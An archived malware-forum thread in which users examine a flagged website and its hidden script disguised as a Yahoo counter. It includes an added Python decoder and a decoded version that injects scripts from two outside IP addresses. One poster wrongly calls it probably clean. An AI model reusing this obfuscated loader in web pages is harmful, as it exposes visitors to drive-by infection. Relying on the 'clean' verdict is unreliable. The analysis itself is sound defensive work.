Malware Domain List

Malware Related => Malicious Domains => Topic started by: cconniejean on December 18, 2008, 10:13:48 pm

Title: ixfree.net
Post by: cconniejean on December 18, 2008, 10:13:48 pm
Code:
http://ixfree.net/
Site tagged by Finjan first:
The requested URL was blocked, the page you requested contains malicious code.

I checked the link using the normal ones I use and they all show clean.
ExpLabs Online Scanner showed clean
Dr.Web Online Scanner showed clean

Took the link here, and these were the results; not sure how long this link is good:
Code:
http://anubis.iseclab.org/?action=result&task_id=13549db9428d3b4b4dd344a7587cd66b1&format=html
Using vURL to check the source, guessing it is what I'm seeing at the bottom of the page:
Code:
<IMG height=1 src="/images/c.gif" width=1> </DIV><IFRAME
src="res://C:\WINDOWS\system32\shdoclc.dll/dnserror.htm" width=1
height=1>
</IFRAME></DIV><script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('//%3Cd@%69!%76%20%73%74!y%6C%65=@%64|i`%73p$%6C~%61y:%6Eo&%6E&%65#%3E\n|%64$%6F%63#%75~me$%6E&%74.%77%72`%69&%74e@("%3C%2F%74!%6
5~x@%74@ar#ea|%3E!%22&);|v#%61r%20%69%2C%5F%2C!a=`["7%38#.1!1%30%2E~1@%37~5.@2`1$%22|,%22@1`%395~%2E!%32&%34%2E%37%36.2%35$%31&%22~%5D$%3B%5F%3D@%31#;~%69f%28$%64&%6F%63@u&%6D
#ent.%63`%6Fo#k|%69%65.%6Da$%74%63%68%28%2F%5C%62%68%67&%66@%74~=%31~/%29%3D%3D@n%75$%6C%6C%29~fo%72`(%69%3D0%3B&i%3C&%32~;$%69%2B%2B!)$%64#%6Fc#%75$%6D%65%6E%74`%2Ew%72%69#%74%65(|"%
3C!%73%63%72i#p!%74%3E%69&%66(|%5F$%29%64%6F@%63|%75m$%65%6E%74@%2E%77r@%69t%65`(%5C%22%3C`%73%63r%69%70%74&%20~i@d`=%5F"~+i%2B%22%5F&%20`s~r%63%3D!%2F|/%22+$%61|[~i%5D+$%22$%2F`%63%7
0/@%3F%22%2B%6E&a%76ig%61t&%6F`%72%2E%61%70%70!%4E#%61~%6D~%65@%2E&%63h#%61r%41t&(`0%29+%22#%3E&%3C&%5C%5C@/#%73%63~%72i`%70~t!%3E%5C!%22%29$%3C%5C@/s%63ri#%70%74$%3E%22%29@;!\
n|%2F%2F%3C#%2F%64&%69v`%3E').replace(/\&|#|@|\!|\||~|\$|`/g,""));var yahoo_counter=1;
<!-- counter end --></script>
</BODY></HTML>
Title: Re: ixfree.net
Post by: Kayrac on December 18, 2008, 10:49:36 pm
It unescapes to this:

Code:
//<div style=display:none>
document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
//</div>

I think it's clean, but could be wrong
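
The decoding step described in the post above can be done statically, without letting a browser run the `eval`. This Python sketch is an added example, not code from the thread: it mirrors the script's own order (percent-decode, then delete the junk characters named in its `.replace()` call) and lists any IPv4 literals in the result. `SAMPLE`, `deobfuscate` and `summarize` are names made up for the example, and the sample input is constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample in the same scheme as the thread's script; 192.0.2.10 is a
# documentation address, not one of the hosts from the thread.
SAMPLE = (
    r"""<script>if(typeof(c)!=typeof(1))eval(unescape('//%3Cd@%69!v%3E\n|%64$oc#%75~ment."""
    r"""%77r`ite("%3Cscr&%69pt src=//19@2.0.%32.1!0/cp/?N%3E%3C/scr|ipt%3E");')"""
    r""".replace(/\&|#|@|\!|\||~|\$|`/g,""));</script>"""
)

# Junk characters that the script's own .replace() removes after unescape().
JUNK = re.compile(r"[&#@!|~$`]")
# eval(unescape('...').replace( ... : capture the quoted string argument.
WRAPPER = re.compile(r"""eval\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\.replace\(""", re.S)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def deobfuscate(script_text):
    """Return the decoded layer as text (never executed), or None if no wrapper."""
    m = WRAPPER.search(script_text)
    if m is None:
        return None
    # Source viewers hard-wrap the long line, sometimes inside a %XX token,
    # so real line breaks are dropped before decoding.
    body = m.group(2).replace("\r", "").replace("\n", "")
    # A literal backslash-n is a JavaScript escape: it ends the leading // comment.
    body = body.replace("\\n", "\n")
    # latin-1 matches unescape() for %XX; %uXXXX sequences are not handled here.
    return JUNK.sub("", unquote(body, encoding="latin-1"))


def summarize(decoded):
    """Facts a reviewer would note about the decoded layer."""
    return {
        "ipv4": sorted(set(IPV4.findall(decoded))),
        "writes_script_tag": bool(
            re.search(r"document\.write\([^)]*<script", decoded, re.I)
        ),
    }


if __name__ == "__main__":
    layer = deobfuscate(SAMPLE)
    print(layer)
    print(summarize(layer))
```
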
Title: Re: ixfree.net
Post by: cconniejean on December 18, 2008, 11:51:10 pm
Thank you Kayrac, one of those cookie things, ok, thanks again.
Title: Re: ixfree.net
Post by: Serg on December 19, 2008, 10:28:51 am
I've got just "//just fuck off...<div style=display:none>" ???. Is there any other result?  :)